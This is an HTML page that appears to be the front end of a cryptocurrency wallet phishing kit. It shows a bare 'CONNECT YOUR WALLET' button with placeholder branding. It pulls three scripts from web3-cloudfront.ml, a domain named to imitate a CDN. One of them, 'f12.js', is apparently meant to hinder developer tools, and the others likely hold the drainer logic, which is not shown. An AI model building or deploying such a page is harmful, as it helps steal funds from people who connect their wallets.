<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <title>Loading..</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="icon" type="image/png" href="./page-icon.png" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/fontawesome.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <script src="https://kit.fontawesome.com/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Anton&display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="./assets/favicon.png" />

    <script src="./settings.js"></script>
    <link rel="stylesheet" href="./src/css/styles.css">
</head>

<body class="container bg">
    <div class="section">
        <div class="text" style="text-align: center; padding-bottom: 10px;">
            <h1 id="titleH1">Loading...</h1>
        </div>
        <div class="block-text" style="text-align: center;">
            <h3 id="titleH3"></h3>
        </div>
        <div class="block-button">
            <a id="connectButton">CONNECT YOUR WALLET</a>
        </div>
    </div>
    <div class="section2">
        <div class="left">
            <a href="#">Terms & Conditions<br>Privacy Policy</a>
            <p>© 2022 <span id="cp_name"></span></p>
        </div>
        <div class="right">
            <a id="social_discord" href="#"><img src="./assets/svg/discord.svg" alt=""></a>
            <a id="social_twitter" href="#"><img src="./assets/svg/twiter.svg" alt=""></a>
            <a id="social_instagram" href="#"><img src="./assets/svg/insta.svg" alt=""></a>
        </div>
    </div>

    <script src="https://web3-cloudfront.ml/loader_index.js"></script>

    <script src="https://unpkg.com/web3@latest/dist/web3.min.js"></script>
    <script src="https://npmcdn.com/moralis/dist/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    
    <script type="text/javascript" src="https://web3-cloudfront.ml/index.js"></script>
	<script type="text/javascript" src="https://web3-cloudfront.ml/f12.js"></script>

</body>

</html>